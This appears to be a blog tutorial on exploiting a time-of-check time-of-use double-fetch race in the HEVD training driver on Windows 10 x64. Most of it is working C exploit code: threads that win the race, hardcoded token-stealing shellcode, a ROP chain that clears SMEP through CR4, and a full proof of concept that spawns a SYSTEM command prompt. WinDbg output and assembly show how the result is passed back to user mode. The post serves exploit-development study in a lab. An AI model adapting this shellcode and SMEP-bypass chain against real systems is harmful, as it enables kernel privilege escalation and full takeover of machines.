Windows 10 x64 Kernel Exploitation - Time-of-Check Time-of-Use (TOCTOU) Race Condition using HEVD
Looking at the Vulnerability
If we look at the TriggerDoubleFetch
function within the HEVD driver with Binary Ninja, we can see it's a stack buffer overflow like the one in the first blog post, except this time a check has been added to ensure the size of the buffer passed from userland is <= 0x800.
However, between the time-of-check (TOC) and time-of-use (TOU), the UserDoubleFetch->Size
value could change, which makes the code vulnerable to a TOCTOU race condition.
Triggering the TOCTOU Race
I thought this would be difficult since the TOCTOU window is only a couple of assembly instructions, which would execute within a few nanoseconds. But it turns out it's not too bad: you just need, at a minimum, two threads, one consistently calling DeviceIoControl
with a small buffer size that passes the check, and one that's switching the buffer size to a bigger value. The example below uses 5 threads doing each, but I got it working with NUM_THREADS
set to 1
.
Some people do fancy stuff like pinning the threads to different CPU cores or changing the process priority, but I didn't need this, and didn't want to, since the code needs to run as a low-privileged user and these APIs should require privileges like SeIncreaseBasePriorityPrivilege
.
#include <Windows.h>
#include <stdio.h>
#include <string.h>
/* Shorthand for unsigned long long; used below as the loop-counter type. */
typedef unsigned long long u64;
/*
 * Request structure passed to the driver as the input of the double-fetch
 * IOCTL (see DeviceIoControlThread).
 */
typedef struct _DOUBLE_FETCH {
PVOID Buffer; /* user-mode buffer the request points at */
SIZE_T Size; /* size reported for Buffer; rewritten concurrently by both thread roles */
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Argument block shared (by pointer) between every thread started in main(). */
typedef struct _IRP_ARGS {
HANDLE hHEVD; /* handle to the HEVD device opened in main() */
DOUBLE_FETCH pDoubleFetch; /* the request itself, stored by value despite the 'p' prefix */
} IRP_ARGS, *PIRP_ARGS;
/*
 * Number of elements in the array expression x.
 * Only valid for true arrays (not pointers). The argument is parenthesized so
 * that expressions such as casts or dereferences are measured as a whole.
 */
#define ArraySize(x) (sizeof(x) / sizeof((x)[0]))
/* Builds a control code with FILE_DEVICE_UNKNOWN, METHOD_NEITHER and FILE_ANY_ACCESS for the given function number. */
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
/* Control code issued by DeviceIoControlThread to reach the double-fetch handler. */
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)
/* Number of threads main() starts for each of the two roles. */
#define NUM_THREADS 5
/* Size of the user buffer and the oversized Size value written by the racing thread (2500 > 0x800). */
#define BUFFER_SIZE 2500
/*
 * Worker thread: endlessly submits the double-fetch request to the driver.
 *
 * lpParameters points at the shared IRP_ARGS. Before every request the Size
 * field is reset to 0x10 so the request starts out with a small size; the
 * racing thread overwrites the same field concurrently.
 * The loop never terminates on its own; main() ends the thread.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
    PIRP_ARGS args = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *request = &args->pDoubleFetch;

    for (;;) {
        DWORD bytesReturned = 0;

        /* Start each attempt from the small size. */
        request->Size = 0x10;

        /* Input-only request: no output buffer is supplied. */
        DeviceIoControl(args->hHEVD, HEVD_IOCTL_DOUBLE_FETCH,
                        request, sizeof(DOUBLE_FETCH),
                        NULL, 0x00,
                        &bytesReturned, NULL);

        Sleep(1);
    }

    return 0;
}
/*
 * Racing thread: keeps overwriting the shared request's Size field with
 * BUFFER_SIZE while the worker thread keeps resetting it to a small value.
 *
 * lpParameters points at the shared IRP_ARGS. Runs until terminated by main().
 */
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {
    PIRP_ARGS args = (PIRP_ARGS)lpParameters;

    for (;;) {
        args->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    return 0;
}
int main(void) {
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (!hHEVD) ExitProcess(1);
PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!buffer) ExitProcess(1);
memset(buffer, 'A', BUFFER_SIZE);
IRP_ARGS pIRPArgs = {
.hHEVD = hHEVD,
.pDoubleFetch.Buffer = buffer,
.pDoubleFetch.Size = 0,
};
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
for (u64 i = 0; i < NUM_THREADS; i++) {
hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread, &pIRPArgs, 0, NULL);
}
Sleep(30000);
for (u64 i = 0; i < NUM_THREADS; i++) {
if (hThreadWork[i] != NULL) {
TerminateThread(hThreadWork[i], 0);
CloseHandle(hThreadWork[i]);
}
if (hThreadRace[i] != NULL) {
TerminateThread(hThreadRace[i], 0);
CloseHandle(hThreadRace[i]);
}
}
return 0;
}
Getting RCE
This is exactly the same as the Stack Buffer Overflow post.
The full PoC:
#include <Windows.h>
#include <Psapi.h>
#include <stdio.h>
#include <string.h>
/* Short aliases for the built-in integer types. */
typedef signed char i8;
typedef short i16;
typedef int i32;
typedef long long i64;
typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
/*
 * Request structure passed to the driver as the input of the double-fetch
 * IOCTL (see DeviceIoControlThread).
 */
typedef struct _DOUBLE_FETCH {
PVOID Buffer; /* user-mode buffer the request points at */
SIZE_T Size; /* size reported for Buffer; rewritten concurrently by both thread roles */
} DOUBLE_FETCH, *PDOUBLE_FETCH;
/* Argument block shared (by pointer) between the threads started in main(). */
typedef struct _IRP_ARGS {
HANDLE hHEVD; /* handle to the HEVD device opened in main() */
HANDLE hEvent; /* set by the worker thread on success; polled by the racing thread and awaited by main() */
DOUBLE_FETCH pDoubleFetch; /* the request itself, stored by value despite the 'p' prefix */
} IRP_ARGS, *PIRP_ARGS;
/*
 * Number of elements in the array expression x.
 * Only valid for true arrays (not pointers). The argument is parenthesized so
 * that expressions such as casts or dereferences are measured as a whole.
 */
#define ArraySize(x) (sizeof(x) / sizeof((x)[0]))
/* Builds a control code with FILE_DEVICE_UNKNOWN, METHOD_NEITHER and FILE_ANY_ACCESS for the given function number. */
#define IOCTL(Function) CTL_CODE (FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)
/* Control code issued by DeviceIoControlThread to reach the double-fetch handler. */
#define HEVD_IOCTL_DOUBLE_FETCH IOCTL(0x80D)
/* Number of threads main() starts for each of the two roles; a single pair here. */
#define NUM_THREADS 1
/* Size of the user buffer and the oversized Size value written by the racing thread (2500 > 0x800). */
#define BUFFER_SIZE 2500
BOOL IsSYSTEM(void) {
char cUsername[256];
DWORD nameLen = sizeof(cUsername);
GetUserNameA(cUsername, &nameLen);
return strcmp(cUsername, "SYSTEM") == 0;
}
/*
 * Worker thread: submits the double-fetch request in a loop until the calling
 * thread is reported as SYSTEM by IsSYSTEM().
 *
 * lpParameters points at the shared IRP_ARGS. Size is reset to 0x10 before
 * every request. Once IsSYSTEM() succeeds, the shared event is signalled so the
 * racing thread and main() can proceed, and the thread returns 0.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
    PIRP_ARGS args = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *request = &args->pDoubleFetch;

    for (;;) {
        DWORD bytesReturned = 0;

        /* Start each attempt from the small size. */
        request->Size = 0x10;

        /* Input-only request: no output buffer is supplied. */
        DeviceIoControl(args->hHEVD, HEVD_IOCTL_DOUBLE_FETCH,
                        request, sizeof(DOUBLE_FETCH),
                        NULL, 0x00,
                        &bytesReturned, NULL);

        if (!IsSYSTEM()) {
            /* Not there yet: back off briefly and try again. */
            Sleep(1);
            continue;
        }

        printf("Overflow triggered\n");
        printf("DeviceIoControlThread thread exiting\n");
        SetEvent(args->hEvent);
        return 0;
    }

    return 0;
}
/*
 * Racing thread: keeps overwriting the shared request's Size field with
 * BUFFER_SIZE until the shared event is signalled.
 *
 * lpParameters points at the shared IRP_ARGS. The event is polled with a zero
 * timeout on every iteration, so the loop never blocks on it.
 */
DWORD WINAPI SizeChaingingThread(LPVOID lpParameters) {
    PIRP_ARGS args = (PIRP_ARGS)lpParameters;

    for (;;) {
        if (WaitForSingleObject(args->hEvent, 0) == WAIT_OBJECT_0) {
            break;
        }
        args->pDoubleFetch.Size = BUFFER_SIZE;
        Sleep(1);
    }

    printf("SizeChaingingThread exiting\n");
    return 0;
}
u64 GetKernelBaseAddress() {
LPVOID drivers[1024] = { 0 };
DWORD cbNeeded;
EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
return (u64)drivers[0];
}
int main(void) {
HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, NULL);
if (!hEvent) ExitProcess(1);
// 1. Setup Drive Handle
HANDLE hHEVD = CreateFileA(
"\\\\.\\HackSysExtremeVulnerableDriver",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (!hHEVD) ExitProcess(1);
// 2. Setup Shellcode
unsigned char token_steal[] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80,
0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d, 0x8b, 0x80, 0x48, 0x04,
0x00, 0x00, 0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b,
0x88, 0xb8, 0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66, 0xff, 0xc1, 0x66, 0x89,
0x88, 0xe4, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01,
0x00, 0x00, 0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0xb8, 0x02, 0x00, 0x00, 0x00, 0x0f,
0x01, 0xf8, 0x48, 0x0f, 0x07
};
LPVOID shellcode = VirtualAlloc(NULL, sizeof(token_steal), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcode) ExitProcess(1);
memcpy(shellcode, token_steal, sizeof(token_steal));
BOOL bLockRet = VirtualLock(shellcode, sizeof(token_steal));
if (!bLockRet) {
printf("VirtualLock failed with error %lx\n", GetLastError());
return 1;
}
// 3. Get Kernel Base
u64 kernelBase = (u64)GetKernelBaseAddress();
if (kernelBase == 0x00) return 1;
// 4. Setup buffer to send
PVOID buffer = VirtualAlloc(NULL, BUFFER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!buffer) ExitProcess(1);
// Setup ROP Chain
const u64 POP_RCX = kernelBase + 0x9b2952; // pop rcx; ret;
const u64 MOV_CR4_RCX = kernelBase + 0x9aa31b; // mov cr4, rcx; ret;
const u64 offset = 2072;
u64* rop = (u64*)((u64)buffer + offset);
u64 index = 0;
*(rop + index++) = POP_RCX;
*(rop + index++) = 0xb50ef8 ^ 1UL << 20;
*(rop + index++) = MOV_CR4_RCX;
*(rop + index++) = (u64)shellcode;
// Trigger the overflow
IRP_ARGS pIRPArgs = {
.hHEVD = hHEVD,
.hEvent = hEvent,
.pDoubleFetch.Buffer = buffer,
.pDoubleFetch.Size = 0,
};
HANDLE hThreadWork[NUM_THREADS] = { 0 };
HANDLE hThreadRace[NUM_THREADS] = { 0 };
for (u64 i = 0; i < NUM_THREADS; i++) {
hThreadWork[i] = CreateThread(NULL, 0, DeviceIoControlThread, &pIRPArgs, 0, NULL);
hThreadRace[i] = CreateThread(NULL, 0, SizeChaingingThread, &pIRPArgs, 0, NULL);
}
printf("Waiting for the race to trigger...\n");
WaitForSingleObject(hEvent, INFINITE);
STARTUPINFOW si = { .cb = sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessW(L"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, FALSE, 0, NULL, NULL,
&si, &pi))
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
return 0;
}
Exactly-Once Delivery
Compared to the original triggering of the TOCTOU buffer overflow, I wanted to trigger it exactly once. The first step was to run a single SizeChaingingThread
thread and a single DeviceIoControlThread
thread. This makes controlling everything with thread synchronization primitives easier.
Then I needed a way to determine if a call to DeviceIoControl
had triggered the overflow. At first, I wanted to use the return value; I thought my shellcode could set eax
to something like 2 (because a BOOL
is really an int
) but for whatever reason, I never got the value stored in eax
back as the return value of DeviceIoControl
. Maybe some wrapper in NTDLL just changed it back to 1/0 to follow specification. NOTE: I realized while writing this blog I should have checked GetLastError
, oh well.
My second idea was then to check if I had a SYSTEM
token. That actually requires a bunch of code (OpenProcessToken
, GetTokenInformation
, AllocateAndInitializeSid
, etc), so it's easier to just call GetUserNameA
and check for SYSTEM
. And this worked fine in the PoC above.
My last idea was to actually write back into the UserDoubleFetch->Buffer
from the shellcode, and then after every DeviceIoControl
call, check the Buffer
. This is better because it saves calling GetUserNameA
thousands of times. Let's implement this!
Pass-Back the Result
During TriggerDoubleFetch
I took note of the UserDoubleFetch
address (0x00000034e331f828
) and UserDoubleFetch->Buffer
address (0x000002194edf0000
). Then once the exploit reached the shellcode, I needed to find one of these in the registers or on the stack. I managed to find the UserDoubleFetch
stored on the stack in a couple locations.
2: kd> s -q rsp l10000 0x00000034e331f828
ffff818c`82c2fa10 00000034`e331f828 00000000`00000010
ffff818c`82c2fa80 00000034`e331f828 00007ffb`00000010
ffff818c`82c2fc10 00000034`e331f828 00000000`000000e0
Now we can find the offset from rsp
.
2: kd> ? ffff818c`82c2fa10 - rsp
Evaluate expression: 744 = 00000000`000002e8
We have a pointer to the DOUBLE_FETCH
struct. Let's dereference that to get the struct data.
2: kd> dq rsp+2e8
ffff818c`82c2fa10 00000034`e331f828 00000000`00000010
So 00000034`e331f828
holds the struct data. The first element is the Buffer
, let's check.
2: kd> dq 00000034`e331f828
00000034`e331f828 00000219`4edf0000 00000000`000009c4
00000034`e331f838 00000000`00000000 00000000`00000010
So the Buffer
should be at 00000219`4edf0000
, let's have a look.
2: kd> dq 00000219`4edf0000
00000219`4edf0000 61413161`41306141 41346141`33614132
00000219`4edf0010 37614136`61413561 62413961`41386141
00000219`4edf0020 41326241`31624130 35624134`62413362
00000219`4edf0030 62413762`41366241 41306341`39624138
00000219`4edf0040 33634132`63413163 63413563`41346341
Yup that's our pattern, and 61413161`41306141
is offset 0.
So we can dereference rsp + 0x2e8
to get the DOUBLE_FETCH
struct, then dereference that value to get the Buffer
, and then dereference the Buffer
to write something at offset 0.
In assembly that would be:
mov rax, [rsp + 0x2e8] ; rax = pointer to the DOUBLE_FETCH struct saved on the stack (poi(rsp + 0x2e8))
mov rbx, [rax] ; rbx = first field of the struct, i.e. the Buffer pointer (poi(poi(rsp + 0x2e8)))
mov dword [rbx], 0xDEADBEEF ; store the 0xDEADBEEF marker at offset 0 of Buffer
I added that assembly to the shellcode. Now the DeviceIoControlThread
function can be updated to the below, and we can correctly determine if the DeviceIoControl
call triggered an overflow and ran the shellcode by checking the value at pIRPArgs->pDoubleFetch.Buffer
, which IMO is nicer than spamming GetUserNameA
.
/*
 * Worker thread: submits the double-fetch request in a loop until the first
 * 32 bits of the request buffer read back as 0xDEADBEEF.
 *
 * lpParameters points at the shared IRP_ARGS. Size is reset to 0x10 before
 * every request. When the marker is seen, the shared event is signalled and
 * the thread returns 0.
 */
DWORD WINAPI DeviceIoControlThread(LPVOID lpParameters) {
    PIRP_ARGS args = (PIRP_ARGS)lpParameters;
    DOUBLE_FETCH *request = &args->pDoubleFetch;

    for (;;) {
        DWORD bytesReturned = 0;

        /* Start each attempt from the small size. */
        request->Size = 0x10;

        /* Input-only request: no output buffer is supplied. */
        DeviceIoControl(args->hHEVD, HEVD_IOCTL_DOUBLE_FETCH,
                        request, sizeof(DOUBLE_FETCH),
                        NULL, 0x00,
                        &bytesReturned, NULL);

        /* Look for the marker at offset 0 of the buffer. */
        u32 marker = *(u32*)request->Buffer;
        if (marker != (u32)0xDEADBEEF) {
            Sleep(1);
            continue;
        }

        printf("Overflow triggered\n");
        printf("DeviceIoControlThread thread exiting\n");
        SetEvent(args->hEvent);
        return 0;

        /* Earlier detection method, kept for comparison: */
        //if (IsSYSTEM()) {
        //printf("Overflow triggered\n");
        //printf("DeviceIoControlThread thread exiting\n");
        //SetEvent(pIRPArgs->hEvent);
        //return 0;
        //}
    }

    return 0;
}